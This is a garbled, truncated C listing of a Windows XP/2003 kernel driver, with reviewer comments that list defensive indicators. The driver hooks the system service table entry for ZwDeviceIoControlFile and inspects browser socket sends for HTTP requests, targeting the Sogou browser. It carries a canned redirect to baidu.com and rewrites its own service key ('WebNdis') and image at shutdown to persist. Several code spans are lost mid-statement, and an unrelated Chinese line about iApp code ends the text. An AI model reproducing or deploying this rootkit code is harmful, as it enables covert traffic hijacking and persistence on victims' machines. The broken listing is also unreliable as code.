/*
 * NOTE(review): this listing was recovered from a web page that collapsed the
 * source onto a handful of lines and appears to have dropped the text between
 * each '<' and the next '>' (the header name after the first #include, every
 * loop bound, and the spans that held the _except handlers and the start of
 * DefDispatch). The tokens below are reproduced exactly as found, re-flowed
 * onto separate lines; the gaps are marked, not reconstructed. DriverEntry is
 * also truncated at the end of the page.
 *
 * What the visible code does: a 32-bit Windows XP / Server 2003 kernel driver
 * that overwrites the SSDT slot of ZwDeviceIoControlFile with
 * LYH_ZwDeviceIoControlFile (picking the service index by OS version), maps
 * AFD (winsock) send buffers through an MDL to look for HTTP requests, carries
 * a canned "301 Moved Permanently -> http://www.baidu.com" response (the code
 * that emits it is in a lost span), and on IRP_MJ_SHUTDOWN recreates its own
 * service registry key (DisplayName "WebNdis", Start=1, Type=1) and, if a copy
 * of its image is held in FileBuff, rewrites the image file. Indicators a
 * defender can look for: a kernel driver with DisplayName "WebNdis", an
 * IRP_MJ_SHUTDOWN handler that calls ZwCreateKey/ZwSetValueKey on its own
 * service key and ZwCreateFile(GENERIC_WRITE) on its own ImagePath, and the
 * SSDT entry for service index 0x42 (XP) / 0x45 (2003) pointing into a
 * third-party driver image.
 */
#ifdef __cplusplus
extern "C" {
#endif
/* NOTE(review): the header name is missing after this #include, presumably
 * lost with the angle brackets during extraction. */
#include
#ifdef __cplusplus
}
#endif
#include "VMProtectSDK.h"
#pragma comment(lib, "VMProtectSDK32.lib")
#include "1.h"

/* Saved SSDT state: the address of the ZwDeviceIoControlFile slot, the
 * original pointer that was stored there, and the service index chosen for
 * the running OS version. All three are set in DriverEntry. */
ULONG ZwDeviceIoControlFile_BaseAddress = 0x0;
ULONG ZwDeviceIoControlFile_value = 0x0;
ULONG ZwDeviceIoControlFile_num = 0x0;

/*
 * Driver unload: removes the symbolic link and device object, then writes the
 * saved original pointer back into the SSDT slot via ChangeMemory_inte()
 * (declared elsewhere, presumably in "1.h"; how it handles write protection
 * is not visible here). RestoreRegPath.Buffer and pvpi, both allocated in
 * DriverEntry, are not released on this path.
 */
VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
    PDEVICE_OBJECT Device;
    UNICODE_STRING SymName;
    Device = DriverObject->DeviceObject;
    if (Device != NULL) {
        RtlInitUnicodeString(&SymName, DEVSYMNAME);
        IoDeleteSymbolicLink(&SymName);
        IoDeleteDevice(Device);
    }
    /* Only unhook if DriverEntry actually patched the table. */
    if (ZwDeviceIoControlFile_BaseAddress != 0 && ZwDeviceIoControlFile_value != 0) {
        ChangeMemory_inte(ZwDeviceIoControlFile_BaseAddress, ZwDeviceIoControlFile_value);
    }
}

/* Layout of the user-mode buffer descriptors handed to AFD's socket IOCTLs.
 * Assumed to mirror WSABUF and AFD's internal send/recv info block — the
 * definitions are hand-written here, not taken from a public header. */
typedef struct AFD_WSABUF {
    ULONG len;
    PCHAR buf;
} AFD_WSABUF, *PAFD_WSABUF;

typedef struct AFD_INFO {
    PAFD_WSABUF BufferArray;
    ULONG BufferCount;
    ULONG AfdFlags;
    ULONG TdiFlags;
} AFD_INFO, *PAFD_INFO;

/* One tracked process: its PID and the socket file handle seen in the hook. */
typedef struct _LYH_ie {
    HANDLE pid;
    HANDLE FileHandle;
} LYH_IE, *PLYH_IE;

#define IE_MaxNum 1000
/* Fixed-size table of tracked processes. Note that DriverEntry clears only
 * 4 * IE_MaxNum bytes of it, i.e. half of the array on the 32-bit target. */
LYH_IE IeBuff[IE_MaxNum];

/*
 * SSDT hook for ZwDeviceIoControlFile. Visible behaviour: for IOCTL 0x1201f
 * (this value appears to be IOCTL_AFD_SEND) it reads the caller's AFD_INFO
 * straight from InputBuffer, records whether the current process image name
 * is "sogouexplorer.e" (apparently the 15-character truncated name returned
 * by PsGetProcessImageFileName), locks the first send buffer through an MDL
 * and tests it for a "get"/"post" prefix; a second path using IoWriteAccess
 * and an "http" prefix test follows. The loop bounds, the use of JmpUrl and
 * IsSoGou, the _except handlers and the call-through to the original function
 * were all lost in extraction, so the forwarding logic cannot be read here.
 *
 * Review notes on what is visible:
 *  - InputBuffer is a user-mode pointer; AdInfo->BufferArray->len is
 *    dereferenced before the _try block and without ProbeForRead, so a
 *    malformed caller can fault the kernel at that line.
 *  - pMdl is only known to be released in a lost span; nothing visible frees it.
 *  - RetValue is initialised but no visible statement assigns or returns it.
 *  - `_try` (single underscore) is reproduced as found; MSVC spells it `__try`.
 */
NTSTATUS NTAPI LYH_ZwDeviceIoControlFile(IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG IoControlCode, IN PVOID InputBuffer OPTIONAL, IN ULONG InputBufferLength, OUT PVOID OutputBuffer OPTIONAL, IN ULONG OutputBufferLength)
{
    NTSTATUS RetValue = STATUS_SUCCESS;
    HANDLE pid = 0x0;
    PAFD_INFO AdInfo;
    ULONG len,i;
    BOOLEAN IsFind = FALSE;
    /* Canned redirect response; the statement that copies it into a buffer is
     * in a lost span. */
    CHAR JmpUrl[] = {"HTTP/1.1 301 Moved Permanently\r\nLocation: http://www.baidu.com\r\n"};
    PMDL pMdl;
    PVOID MdlAddress;
    PEPROCESS process;
    PCHAR name;
    BOOLEAN IsSoGou = FALSE;
    pid = PsGetCurrentProcessId();
    if (IoControlCode == 0x1201f) {
        AdInfo = (PAFD_INFO)InputBuffer;            /* user pointer, never probed */
        len = AdInfo->BufferArray->len;              /* dereferenced outside _try */
        process = PsGetCurrentProcess();
        name = PsGetProcessImageFileName(process);
        if (_stricmp(name, "sogouexplorer.e") == 0) {
            IsSoGou = TRUE;
        } else {
            IsSoGou = FALSE;
        }
        IsFind = FALSE;
        pMdl = IoAllocateMdl(AdInfo->BufferArray->buf, len, FALSE, FALSE, NULL);
        if (pMdl != NULL) {
            _try {
                MmProbeAndLockPages(pMdl, UserMode, IoReadAccess);
                MdlAddress = MmMapLockedPagesSpecifyCache(pMdl, KernelMode, MmCached, NULL, FALSE, NormalPagePriority);
                if (MdlAddress != NULL) {
                    if (_strnicmp((PCHAR)MdlAddress, "get", 3) == 0 || _strnicmp((PCHAR)MdlAddress, "post", 4) == 0) {
                        /* 0x14 (20) bytes are trimmed from the length; the reason
                         * is not stated anywhere in the visible code. */
                        if (len > 0x14) {
                            len -= 0x14;
                        }
                        /* NOTE(review): text lost between "i" and "pid == pid)" — the
                         * loop bound, the start of the loop body and the first
                         * branch (presumably the IsSoGou case) are missing. */
                        for (i = 0; i pid == pid) // walk the table looking for this process
                        {
                            IsFind = TRUE;
                            break;
                        }
                    } else {
                        if (IeBuff[i].pid == pid) {
                            IsFind = TRUE;
                            break;
                        }
                    }
                }
                // not found: add it
                if (!IsFind) {
                    /* NOTE(review): text lost between "i" and "BufferArray->len;" — this
                     * span evidently held the insert into IeBuff, the rest of the read
                     * path, its _except handler, and the start of the second IOCTL
                     * branch up to "AdInfo->". */
                    for (i = 0; i BufferArray->len;
                    process = PsGetCurrentProcess();
                    name = PsGetProcessImageFileName(process);
                    if (_stricmp(name, "sogouexplorer.e") == 0) {
                        IsSoGou = TRUE;
                    } else {
                        IsSoGou = FALSE;
                    }
                    /* Second path: the buffer is locked for write, so this is the
                     * side where a response would be placed. */
                    pMdl = IoAllocateMdl(AdInfo->BufferArray->buf, len, FALSE, FALSE, NULL);
                    if (pMdl != NULL) {
                        _try{
                            MmProbeAndLockPages(pMdl, UserMode, IoWriteAccess);
                            MdlAddress = MmMapLockedPagesSpecifyCache(pMdl, KernelMode, MmCached, NULL, FALSE, NormalPagePriority);
                            if (MdlAddress != NULL) {
                                if (_strnicmp((PCHAR)MdlAddress, "http", 4) == 0) {
                                    IsFind = FALSE;
                                    /* NOTE(review): text lost between "i" and "IoStatus.Status" —
                                     * the remainder of this function (including any use of
                                     * JmpUrl and the call to the original ZwDeviceIoControlFile)
                                     * and the header of the next routine are missing. */
                                    for (i = 0; i IoStatus.Status = STATUS_SUCCESS;
    /* The three statements below are apparently the tail of DefDispatch, the
     * routine DriverEntry registers for IRP_MJ_CREATE and IRP_MJ_CLOSE: it
     * completes the IRP successfully with no data. */
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}

/* State captured in DriverEntry for the shutdown-time self-restore: the
 * driver's own service key path, the queried ImagePath value, and an optional
 * copy of the driver image (FileBuff/FileSize — where they are filled in is
 * not visible in this listing). */
UNICODE_STRING RestoreRegPath;
PKEY_VALUE_PARTIAL_INFORMATION pvpi = NULL;
ULONG FileSize = 0x0;
PVOID FileBuff = NULL;

/*
 * IRP_MJ_SHUTDOWN handler — the persistence mechanism. If FileBuff is set,
 * the driver image is rewritten to the path stored in pvpi->Data; if pvpi is
 * set, the service key is recreated under RestoreRegPath with
 * DisplayName "WebNdis", ErrorControl=1, ImagePath, Start=1
 * (SERVICE_SYSTEM_START) and Type=1 (SERVICE_KERNEL_DRIVER), presumably so
 * the driver comes back even if its key or file was deleted during the
 * session. Detection: a kernel driver writing its own service key and its
 * own ImagePath at shutdown.
 *
 * Review notes: the FileBuff branch dereferences pvpi->Data before pvpi is
 * checked for NULL (the pvpi check only guards the second branch); the
 * return values of ZwWriteFile and every ZwSetValueKey are ignored; and the
 * IRP is returned STATUS_SUCCESS without being completed, unlike DefDispatch.
 */
NTSTATUS ShutDownDispatch(IN PDEVICE_OBJECT Device, IN PIRP Irp)
{
    NTSTATUS status;
    HANDLE hkey;
    OBJECT_ATTRIBUTES ObjectAttributes;
    UNICODE_STRING RegName;
    PWCHAR DisplayName = {L"WebNdis"};
    ULONG ErrorControl = 0x1, Start = 0x1, Type = 0x1;
    // write the image file back
    HANDLE hfile;
    IO_STATUS_BLOCK IoStatus;
    LARGE_INTEGER number;
    if (FileBuff != NULL) {
        RtlInitUnicodeString(&RegName, (PCWSTR)pvpi->Data);    /* pvpi not checked here */
        InitializeObjectAttributes(&ObjectAttributes, &RegName, OBJ_CASE_INSENSITIVE, NULL, NULL);
        status = ZwCreateFile(&hfile, GENERIC_WRITE, &ObjectAttributes, &IoStatus, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
        if (NT_SUCCESS(status)) {
            number.QuadPart = 0x0;                               /* overwrite from offset 0 */
            ZwWriteFile(hfile, NULL, NULL, NULL, &IoStatus, FileBuff, FileSize, &number, NULL);   /* status ignored */
            ZwClose(hfile);
        }
    }
    // registry write-back
    if (pvpi != NULL) {
        InitializeObjectAttributes(&ObjectAttributes, &RestoreRegPath, OBJ_CASE_INSENSITIVE, NULL, NULL);
        status = ZwCreateKey(&hkey, KEY_ALL_ACCESS, &ObjectAttributes, 0, NULL, 0, NULL);
        if (NT_SUCCESS(status)) {
            RtlInitUnicodeString(&RegName, L"DisplayName");
            ZwSetValueKey(hkey, &RegName, 0, REG_SZ, DisplayName, (wcslen(DisplayName) + 1) * sizeof(WCHAR));
            RtlInitUnicodeString(&RegName, L"ErrorControl");
            ZwSetValueKey(hkey, &RegName, 0, REG_DWORD, &ErrorControl, 4);
            // path of the driver image, as read back in DriverEntry
            RtlInitUnicodeString(&RegName, L"ImagePath");
            ZwSetValueKey(hkey, &RegName, 0, REG_SZ, pvpi->Data, (wcslen((PWCHAR)pvpi->Data) + 1) * sizeof(WCHAR));
            RtlInitUnicodeString(&RegName, L"Start");
            ZwSetValueKey(hkey, &RegName, 0, REG_DWORD, &Start, 4);
            RtlInitUnicodeString(&RegName, L"Type");
            ZwSetValueKey(hkey, &RegName, 0, REG_DWORD, &Type, 4);
            ZwClose(hkey);
        }
    }
    return STATUS_SUCCESS;
}

/*
 * DriverEntry — truncated: the page ends inside the registry-reading block,
 * so the closing braces and the final return are not in this copy.
 * Visible steps: choose the SSDT index by OS version (5.1 / XP -> 0x42,
 * 5.2 / Server 2003 -> 0x45, anything else refuses to load), partially clear
 * IeBuff, save the original table entry and overwrite it with
 * LYH_ZwDeviceIoControlFile via ChangeMemory_inte, create the device and
 * symbolic link, copy RegistryPath into RestoreRegPath, and read the
 * service's ImagePath value into pvpi for ShutDownDispatch.
 *
 * Review notes: memset clears 4 * IE_MaxNum bytes, but sizeof(IeBuff) is
 * 8 * IE_MaxNum on the 32-bit target (two HANDLEs per entry);
 * RestoreRegPath.Buffer is allocated with Length + 1 bytes and used without a
 * NULL check; the SSDT is patched before the device is created, so the early
 * returns on IoCreateDevice / IoCreateSymbolicLink failure leave the table
 * pointing into an image the I/O manager is about to discard (DriverUnload is
 * not invoked when DriverEntry fails); and KEY_ALL_ACCESS is requested where
 * KEY_READ would do for the query.
 */
#ifdef __cplusplus
extern "C"
#endif
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    ULONG MajorVersion,MinorVersion;
    DriverObject->DriverUnload = OnUnload;
    PsGetVersion(&MajorVersion, &MinorVersion, NULL, NULL);
    /* Hard-coded service numbers: the hook only works on the two builds below. */
    if (MajorVersion == 0x5 && MinorVersion == 0x2) {
        ZwDeviceIoControlFile_num = 0x45;
    } else if (MajorVersion == 0x5 && MinorVersion == 0x1) {
        ZwDeviceIoControlFile_num = 0x42;
    } else {
        return STATUS_UNSUCCESSFUL;
    }
    memset(IeBuff, 0, 4 * IE_MaxNum);                            /* clears only half of IeBuff */
    /* Slot address = table base + index * sizeof(pointer) on 32-bit. */
    ZwDeviceIoControlFile_BaseAddress = (ULONG)KeServiceDescriptorTable->ServiceTableBase + ZwDeviceIoControlFile_num * 4;   // XP: 0x42, Server 2003: 0x45
    ZwDeviceIoControlFile_value = *(PULONG)ZwDeviceIoControlFile_BaseAddress;   /* original entry, restored in OnUnload */
    ChangeMemory_inte(ZwDeviceIoControlFile_BaseAddress, (ULONG)LYH_ZwDeviceIoControlFile);
    {
        UNICODE_STRING DevName,SymName;
        NTSTATUS status;
        PDEVICE_OBJECT fdo;
        RtlInitUnicodeString(&DevName, DEVICENAME);
        status = IoCreateDevice(DriverObject, 0, &DevName, FILE_DEVICE_UNKNOWN, 0, FALSE, &fdo);
        if (!NT_SUCCESS(status)) {
            return status;                                       /* SSDT already patched here */
        }
        RtlInitUnicodeString(&SymName, DEVSYMNAME);
        status = IoCreateSymbolicLink(&SymName, &DevName);
        if (!NT_SUCCESS(status)) {
            IoDeleteDevice(fdo);
            return status;                                       /* SSDT already patched here */
        }
        fdo->Flags |= DO_BUFFERED_IO;
        DriverObject->MajorFunction[IRP_MJ_CREATE] = DefDispatch;
        DriverObject->MajorFunction[IRP_MJ_CLOSE] = DefDispatch;
        DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] = ShutDownDispatch;
        /* Keep a private copy of our own service key path for ShutDownDispatch. */
        RestoreRegPath.Buffer = (PWSTR)ExAllocatePool(NonPagedPool, RegistryPath->Length + 1);   /* not NULL-checked */
        RtlCopyMemory(RestoreRegPath.Buffer, RegistryPath->Buffer, RegistryPath->Length);
        RestoreRegPath.Length = RestoreRegPath.MaximumLength = RegistryPath->Length;
        {
            // read the image path from the registry so it can be written back later
            HANDLE hkey;
            UNICODE_STRING ValueName;
            OBJECT_ATTRIBUTES ObjectAttributes;
            ULONG ulSize = 0x0;
            RtlInitUnicodeString(&ValueName, L"ImagePath");
            InitializeObjectAttributes(&ObjectAttributes, RegistryPath, OBJ_CASE_INSENSITIVE, NULL, NULL);
            status = ZwOpenKey(&hkey, KEY_ALL_ACCESS, &ObjectAttributes);
            if (NT_SUCCESS(status)) {
                /* Two-call pattern: first query sizes the buffer, second fills it. */
                status = ZwQueryValueKey(hkey, &ValueName, KeyValuePartialInformation, NULL, 0, &ulSize);
                if (status == STATUS_BUFFER_TOO_SMALL) {
                    pvpi = (PKEY_VALUE_PARTIAL_INFORMATION)ExAllocatePool(PagedPool, ulSize);
                    if (pvpi != NULL) {
                        status = ZwQueryValueKey(hkey, &ValueName, KeyValuePartialInformation, pvpi, ulSize, &ulSize);
                        if (!NT_SUCCESS(status)) {
                            ExFreePool(pvpi);
                            pvpi = NULL;
                        }
                    }
                }
                ZwClose(hkey);
                /* NOTE(review): the listing ends here; the rest of DriverEntry is not on the page. */
- iapp代码怎么更改？第一句话把网址赋值给 a 这个变量，第二句话直接调用 a 变量，括号里填 a 就行。你想要输入什么网址，就把第一句话改一下，例如：s a = "http://www.baidu.com"